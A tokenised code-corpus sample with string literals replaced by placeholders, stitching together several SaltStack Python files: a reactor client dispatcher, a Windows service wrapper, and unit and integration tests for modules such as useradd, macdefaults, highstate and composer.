<EOL> if low [ '<STR_LIT:state>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . event_user <EOL> l_fun ( * f_call . 
get ( '<STR_LIT:args>' , ( ) ) , ** kwargs ) <EOL> except Exception : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( low [ '<STR_LIT:state>' ] , l_fun ) , <EOL> exc_info = True <EOL> ) <EOL> def local ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . client . LocalClient ( self . opts [ '<STR_LIT>' ] ) <EOL> try : <EOL> self . client_cache [ '<STR_LIT>' ] . cmd_async ( * args , ** kwargs ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) <EOL> cmd = local <EOL> def runner ( self , fun , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . runner . RunnerClient ( self . opts ) <EOL> try : <EOL> self . pool . fire_async ( self . client_cache [ '<STR_LIT>' ] . low , args = ( fun , kwargs ) ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) <EOL> def wheel ( self , fun , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . wheel . Wheel ( self . opts ) <EOL> try : <EOL> self . pool . fire_async ( self . client_cache [ '<STR_LIT>' ] . low , args = ( fun , kwargs ) ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) <EOL> def caller ( self , fun , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( "<STR_LIT>" . format ( fun , args , kwargs ) ) <EOL> args = kwargs [ '<STR_LIT:args>' ] <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . client . Caller ( self . opts [ '<STR_LIT>' ] ) <EOL> try : <EOL> self . client_cache [ '<STR_LIT>' ] . 
function ( fun , * args ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) </s>
<s> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from os . path import splitext , abspath <EOL> from sys import modules <EOL> import win32serviceutil <EOL> import win32service <EOL> import win32event <EOL> import win32api <EOL> class Service ( win32serviceutil . ServiceFramework ) : <EOL> _svc_name_ = '<STR_LIT>' <EOL> _svc_display_name_ = '<STR_LIT>' <EOL> def __init__ ( self , * args ) : <EOL> win32serviceutil . ServiceFramework . __init__ ( self , * args ) <EOL> self . log ( '<STR_LIT>' ) <EOL> self . stop_event = win32event . CreateEvent ( None , <NUM_LIT:0> , <NUM_LIT:0> , None ) <EOL> def log ( self , msg ) : <EOL> import servicemanager <EOL> servicemanager . LogInfoMsg ( str ( msg ) ) <EOL> def sleep ( self , sec ) : <EOL> win32api . Sleep ( sec * <NUM_LIT:1000> , True ) <EOL> def SvcDoRun ( self ) : <EOL> self . ReportServiceStatus ( win32service . SERVICE_START_PENDING ) <EOL> try : <EOL> self . ReportServiceStatus ( win32service . SERVICE_RUNNING ) <EOL> self . log ( '<STR_LIT:start>' ) <EOL> self . start ( ) <EOL> self . log ( '<STR_LIT>' ) <EOL> win32event . WaitForSingleObject ( self . stop_event , <EOL> win32event . INFINITE ) <EOL> self . log ( '<STR_LIT>' ) <EOL> except Exception as err : <EOL> self . log ( '<STR_LIT>' . format ( err ) ) <EOL> self . SvcStop ( ) <EOL> def SvcStop ( self ) : <EOL> self . ReportServiceStatus ( win32service . SERVICE_STOP_PENDING ) <EOL> self . log ( '<STR_LIT>' ) <EOL> self . stop ( ) <EOL> self . log ( '<STR_LIT>' ) <EOL> win32event . SetEvent ( self . stop_event ) <EOL> self . ReportServiceStatus ( win32service . SERVICE_STOPPED ) <EOL> def start ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> pass <EOL> def instart ( cls , name , display_name = None , stay_alive = True ) : <EOL> '''<STR_LIT>''' <EOL> cls . _svc_name_ = name <EOL> cls . _svc_display_name_ = display_name or name <EOL> try : <EOL> module_path = modules [ cls . __module__ ] . 
__file__ <EOL> except AttributeError : <EOL> from sys import executable <EOL> module_path = executable <EOL> module_file = splitext ( abspath ( module_path ) ) [ <NUM_LIT:0> ] <EOL> cls . _svc_reg_class_ = '<STR_LIT>' . format ( module_file , cls . __name__ ) <EOL> if stay_alive : <EOL> win32api . SetConsoleCtrlHandler ( lambda x : True , True ) <EOL> try : <EOL> win32serviceutil . InstallService ( <EOL> cls . _svc_reg_class_ , <EOL> cls . _svc_name_ , <EOL> cls . _svc_display_name_ , <EOL> startType = win32service . SERVICE_AUTO_START <EOL> ) <EOL> print ( '<STR_LIT>' ) <EOL> win32serviceutil . StartService ( <EOL> cls . _svc_name_ <EOL> ) <EOL> print ( '<STR_LIT>' ) <EOL> except Exception as err : <EOL> print ( str ( err ) ) </s>
<s> from __future__ import absolute_import <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> class TestSyndic ( integration . SyndicCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_ping ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertTrue ( self . run_function ( '<STR_LIT>' ) ) <EOL> def test_fib ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertEqual ( <EOL> self . run_function ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> ) [ <NUM_LIT:0> ] , <EOL> <NUM_LIT> <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( TestSyndic ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> class LoaderOverridesTest ( integration . ModuleCase ) : <EOL> def test_overridden_internal ( self ) : <EOL> funcs = self . run_function ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , funcs ) <EOL> self . assertNotIn ( '<STR_LIT>' , funcs ) <EOL> self . assertIn ( '<STR_LIT>' , funcs ) <EOL> text = '<STR_LIT>' <EOL> self . assertEqual ( <EOL> self . run_function ( '<STR_LIT>' , arg = [ text ] ) [ : : - <NUM_LIT:1> ] , <EOL> self . run_function ( '<STR_LIT>' , arg = [ text ] ) , <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( LoaderOverridesTest ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> from salttesting import skipIf <EOL> from salttesting . helpers import ( <EOL> destructiveTest , <EOL> ensure_in_syspath , <EOL> requires_system_grains <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> DEFAULT_DOMAIN = '<STR_LIT>' <EOL> DEFAULT_KEY = '<STR_LIT>' <EOL> DEFAULT_VALUE = '<STR_LIT:0>' <EOL> class MacDefaultsModuleTest ( integration . ModuleCase ) : <EOL> '''<STR_LIT>''' <EOL> def setUp ( self ) : <EOL> '''<STR_LIT>''' <EOL> os_grain = self . run_function ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> if os_grain [ '<STR_LIT>' ] not in '<STR_LIT>' : <EOL> self . skipTest ( <EOL> '<STR_LIT>' . format ( <EOL> ** os_grain <EOL> ) <EOL> ) <EOL> @ destructiveTest <EOL> @ skipIf ( os . geteuid ( ) != <NUM_LIT:0> , '<STR_LIT>' ) <EOL> @ requires_system_grains <EOL> def test_macdefaults_write_read ( self , grains = None ) : <EOL> '''<STR_LIT>''' <EOL> write_domain = self . run_function ( '<STR_LIT>' , <EOL> [ DEFAULT_DOMAIN , <EOL> DEFAULT_KEY , <EOL> DEFAULT_VALUE ] ) <EOL> self . assertTrue ( write_domain ) <EOL> read_domain = self . run_function ( '<STR_LIT>' , <EOL> [ DEFAULT_DOMAIN , <EOL> DEFAULT_KEY ] ) <EOL> self . assertTrue ( read_domain ) <EOL> self . assertEqual ( read_domain , DEFAULT_VALUE ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( MacDefaultsModuleTest ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import string <EOL> import random <EOL> from salttesting import skipIf <EOL> from salttesting . helpers import ( <EOL> destructiveTest , <EOL> ensure_in_syspath , <EOL> requires_system_grains <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import salt . utils <EOL> import integration <EOL> from salt . ext . six . moves import range <EOL> @ destructiveTest <EOL> @ skipIf ( os . geteuid ( ) != <NUM_LIT:0> , '<STR_LIT>' ) <EOL> @ skipIf ( not salt . utils . is_linux ( ) , '<STR_LIT>' ) <EOL> class UseraddModuleTest ( integration . ModuleCase ) : <EOL> def setUp ( self ) : <EOL> super ( UseraddModuleTest , self ) . setUp ( ) <EOL> os_grain = self . run_function ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> if os_grain [ '<STR_LIT>' ] not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . skipTest ( <EOL> '<STR_LIT>' . format ( <EOL> ** os_grain <EOL> ) <EOL> ) <EOL> def __random_string ( self , size = <NUM_LIT:6> ) : <EOL> return '<STR_LIT>' + '<STR_LIT>' . join ( <EOL> random . choice ( string . ascii_uppercase + string . digits ) <EOL> for x in range ( size ) <EOL> ) <EOL> @ requires_system_grains <EOL> def test_groups_includes_primary ( self , grains = None ) : <EOL> uname = self . __random_string ( ) <EOL> if self . run_function ( '<STR_LIT>' , [ uname ] ) is not True : <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> try : <EOL> uinfo = self . run_function ( '<STR_LIT>' , [ uname ] ) <EOL> if grains [ '<STR_LIT>' ] in ( '<STR_LIT>' , ) : <EOL> self . assertIn ( '<STR_LIT>' , uinfo [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . assertIn ( uname , uinfo [ '<STR_LIT>' ] ) <EOL> uid = uinfo [ '<STR_LIT>' ] <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> gname = self . __random_string ( ) <EOL> if self . run_function ( '<STR_LIT>' , [ gname ] ) is not True : <EOL> self . 
run_function ( '<STR_LIT>' , [ gname , True , True ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> ginfo = self . run_function ( '<STR_LIT>' , [ gname ] ) <EOL> if self . run_function ( '<STR_LIT>' , [ uname , uid , ginfo [ '<STR_LIT>' ] ] ) is False : <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> uinfo = self . run_function ( '<STR_LIT>' , [ uname ] ) <EOL> self . assertIn ( gname , uinfo [ '<STR_LIT>' ] ) <EOL> except AssertionError : <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> raise <EOL> def test_linux_user_primary_group ( self , grains = None ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> if self . run_function ( '<STR_LIT>' , [ name ] ) is not True : <EOL> self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> try : <EOL> primary_group = self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> uid_info = self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> self . assertIn ( primary_group , uid_info [ '<STR_LIT>' ] ) <EOL> except : <EOL> self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> raise <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( UseraddModuleTest ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> import yaml <EOL> import shutil <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> import salt . utils <EOL> class RunTest ( integration . ShellCase , integration . ShellCaseCommonTestsMixIn ) : <EOL> '''<STR_LIT>''' <EOL> _call_binary_ = '<STR_LIT>' <EOL> def test_in_docs ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = self . run_run ( '<STR_LIT>' ) <EOL> data = '<STR_LIT:\n>' . join ( data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> def test_notin_docs ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = self . run_run ( '<STR_LIT>' ) <EOL> data = '<STR_LIT:\n>' . join ( data ) <EOL> self . assertNotIn ( '<STR_LIT>' , data ) <EOL> def test_salt_documentation_too_many_arguments ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = self . run_run ( '<STR_LIT>' , catch_stderr = True ) <EOL> self . assertIn ( '<STR_LIT>' , '<STR_LIT:\n>' . join ( data [ <NUM_LIT:1> ] ) ) <EOL> def test_issue_7754 ( self ) : <EOL> old_cwd = os . getcwd ( ) <EOL> config_dir = os . path . join ( integration . TMP , '<STR_LIT>' ) <EOL> if not os . path . isdir ( config_dir ) : <EOL> os . makedirs ( config_dir ) <EOL> os . chdir ( config_dir ) <EOL> config_file_name = '<STR_LIT>' <EOL> with salt . utils . fopen ( self . get_config_file_path ( config_file_name ) , '<STR_LIT:r>' ) as fhr : <EOL> config = yaml . load ( fhr . read ( ) ) <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with salt . utils . fopen ( os . path . join ( config_dir , config_file_name ) , '<STR_LIT:w>' ) as fhw : <EOL> fhw . write ( <EOL> yaml . 
dump ( config , default_flow_style = False ) <EOL> ) <EOL> ret = self . run_script ( <EOL> self . _call_binary_ , <EOL> '<STR_LIT>' . format ( <EOL> config_dir <EOL> ) , <EOL> timeout = <NUM_LIT:15> , <EOL> catch_stderr = True , <EOL> with_retcode = True <EOL> ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , ret [ <NUM_LIT:0> ] ) <EOL> self . assertFalse ( os . path . isdir ( os . path . join ( config_dir , '<STR_LIT>' ) ) ) <EOL> except AssertionError : <EOL> if os . path . exists ( '<STR_LIT>' ) and ret [ <NUM_LIT:2> ] != <NUM_LIT:2> : <EOL> raise <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:\n>' . join ( ret [ <NUM_LIT:1> ] ) <EOL> ) <EOL> self . assertEqual ( ret [ <NUM_LIT:2> ] , <NUM_LIT:2> ) <EOL> finally : <EOL> self . chdir ( old_cwd ) <EOL> if os . path . isdir ( config_dir ) : <EOL> shutil . rmtree ( config_dir ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( RunTest ) </s>
<s> from __future__ import absolute_import <EOL> import integration <EOL> import salt . wheel <EOL> class KeyWheelModuleTest ( integration . TestCase , integration . AdaptedConfigurationTestCaseMixIn ) : <EOL> def setUp ( self ) : <EOL> self . wheel = salt . wheel . Wheel ( dict ( self . get_config ( '<STR_LIT>' ) ) ) <EOL> def test_list_all ( self ) : <EOL> ret = self . wheel . call_func ( '<STR_LIT>' ) <EOL> self . assertEqual ( ret , { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } ) <EOL> def test_gen ( self ) : <EOL> ret = self . wheel . call_func ( '<STR_LIT>' , id_ = '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , ret ) <EOL> self . assertIn ( '<STR_LIT>' , ret ) <EOL> self . assertTrue ( <EOL> ret . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( <EOL> ret . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( KeyWheelModuleTest , needs_daemon = True ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import os . path <EOL> import tempfile <EOL> from salttesting import TestCase <EOL> from salttesting . mock import patch , MagicMock <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> import salt . config <EOL> from salt . state import HighState <EOL> from salt . utils . odict import OrderedDict , DefaultOrderedDict <EOL> class HighStateTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . root_dir = tempfile . mkdtemp ( dir = integration . TMP ) <EOL> self . state_tree_dir = os . path . join ( self . root_dir , '<STR_LIT>' ) <EOL> self . cache_dir = os . path . join ( self . root_dir , '<STR_LIT>' ) <EOL> if not os . path . isdir ( self . root_dir ) : <EOL> os . makedirs ( self . root_dir ) <EOL> if not os . path . isdir ( self . state_tree_dir ) : <EOL> os . makedirs ( self . state_tree_dir ) <EOL> if not os . path . isdir ( self . cache_dir ) : <EOL> os . makedirs ( self . cache_dir ) <EOL> self . config = salt . config . minion_config ( None ) <EOL> self . config [ '<STR_LIT>' ] = self . root_dir <EOL> self . config [ '<STR_LIT>' ] = False <EOL> self . config [ '<STR_LIT:id>' ] = '<STR_LIT>' <EOL> self . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . config [ '<STR_LIT>' ] = dict ( base = [ self . state_tree_dir ] ) <EOL> self . config [ '<STR_LIT>' ] = self . cache_dir <EOL> self . config [ '<STR_LIT:test>' ] = False <EOL> self . highstate = HighState ( self . config ) <EOL> self . highstate . push_active ( ) <EOL> def tearDown ( self ) : <EOL> self . highstate . pop_active ( ) <EOL> def test_top_matches_with_list ( self ) : <EOL> top = { '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } } <EOL> matches = self . highstate . top_matches ( top ) <EOL> self . 
assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> def test_top_matches_with_string ( self ) : <EOL> top = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } <EOL> matches = self . highstate . top_matches ( top ) <EOL> self . assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def test_matches_whitelist ( self ) : <EOL> matches = { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } <EOL> matches = self . highstate . matches_whitelist ( matches , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def test_matches_whitelist_with_string ( self ) : <EOL> matches = { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } <EOL> matches = self . highstate . matches_whitelist ( matches , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( matches , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> class TopFileMergeTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def setUp ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . env1 = { '<STR_LIT>' : { '<STR_LIT:*>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . env2 = { '<STR_LIT>' : { '<STR_LIT:*>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . env3 = { '<STR_LIT>' : { '<STR_LIT:*>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . config = self . _make_default_config ( ) <EOL> self . highstate = HighState ( self . config ) <EOL> def _make_default_config ( self ) : <EOL> config = salt . config . minion_config ( None ) <EOL> root_dir = tempfile . mkdtemp ( dir = integration . TMP ) <EOL> state_tree_dir = os . path . join ( root_dir , '<STR_LIT>' ) <EOL> cache_dir = os . path . 
join ( root_dir , '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] = root_dir <EOL> config [ '<STR_LIT>' ] = False <EOL> config [ '<STR_LIT:id>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = dict ( base = [ state_tree_dir ] ) <EOL> config [ '<STR_LIT>' ] = cache_dir <EOL> config [ '<STR_LIT:test>' ] = False <EOL> return config <EOL> def _get_tops ( self ) : <EOL> '''<STR_LIT>''' <EOL> tops = DefaultOrderedDict ( list ) <EOL> tops [ '<STR_LIT:a>' ] . append ( self . env1 ) <EOL> tops [ '<STR_LIT:b>' ] . append ( self . env2 ) <EOL> tops [ '<STR_LIT:c>' ] . append ( self . env3 ) <EOL> return tops <EOL> def test_basic_merge ( self ) : <EOL> '''<STR_LIT>''' <EOL> merged_tops = self . highstate . merge_tops ( self . _get_tops ( ) ) <EOL> expected_merge = DefaultOrderedDict ( OrderedDict ) <EOL> expected_merge [ '<STR_LIT>' ] [ '<STR_LIT:*>' ] = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertEqual ( merged_tops , expected_merge ) <EOL> def test_merge_strategy_same ( self ) : <EOL> '''<STR_LIT>''' <EOL> config = self . _make_default_config ( ) <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = '<STR_LIT:b>' <EOL> highstate = HighState ( config ) <EOL> ret = highstate . get_tops ( ) <EOL> self . assertEqual ( ret , OrderedDict ( [ ( '<STR_LIT:b>' , [ { } ] ) ] ) ) <EOL> def test_ordered_merge ( self ) : <EOL> '''<STR_LIT>''' <EOL> config = self . _make_default_config ( ) <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] = [ '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:c>' ] <EOL> with patch ( '<STR_LIT>' , MagicMock ( return_value = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) ) : <EOL> highstate = HighState ( config ) <EOL> ret = highstate . get_tops ( ) <EOL> self . 
assertEqual ( ret , OrderedDict ( [ ( '<STR_LIT:a>' , [ { } ] ) , ( '<STR_LIT:c>' , [ { } ] ) , ( '<STR_LIT:b>' , [ { } ] ) ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( HighStateTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salt . modules import composer <EOL> from salt . exceptions import CommandExecutionError , CommandNotFoundError , SaltInvocationError <EOL> composer . __grains__ = { } <EOL> composer . __salt__ = { } <EOL> composer . __context__ = { } <EOL> composer . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class ComposerTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_install ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( CommandNotFoundError , composer . install , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( SaltInvocationError , composer . install , None ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( CommandExecutionError , composer . install , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . install ( '<STR_LIT>' , None , None , None , None , <EOL> None , None , None , None , None , <EOL> True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . 
object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . install ( '<STR_LIT>' ) , rval ) <EOL> def test_update ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( CommandNotFoundError , composer . update , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( SaltInvocationError , composer . update , None ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( CommandExecutionError , composer . update , '<STR_LIT:d>' ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . update ( '<STR_LIT>' , None , None , None , None , <EOL> None , None , None , None , None , <EOL> True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . 
object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . update ( '<STR_LIT>' , None , None , None , None , <EOL> None , None , None , None , None , <EOL> True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . update ( '<STR_LIT>' ) , rval ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . update ( '<STR_LIT>' ) , rval ) <EOL> def test_selfupdate ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> self . assertRaises ( CommandNotFoundError , composer . selfupdate ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . 
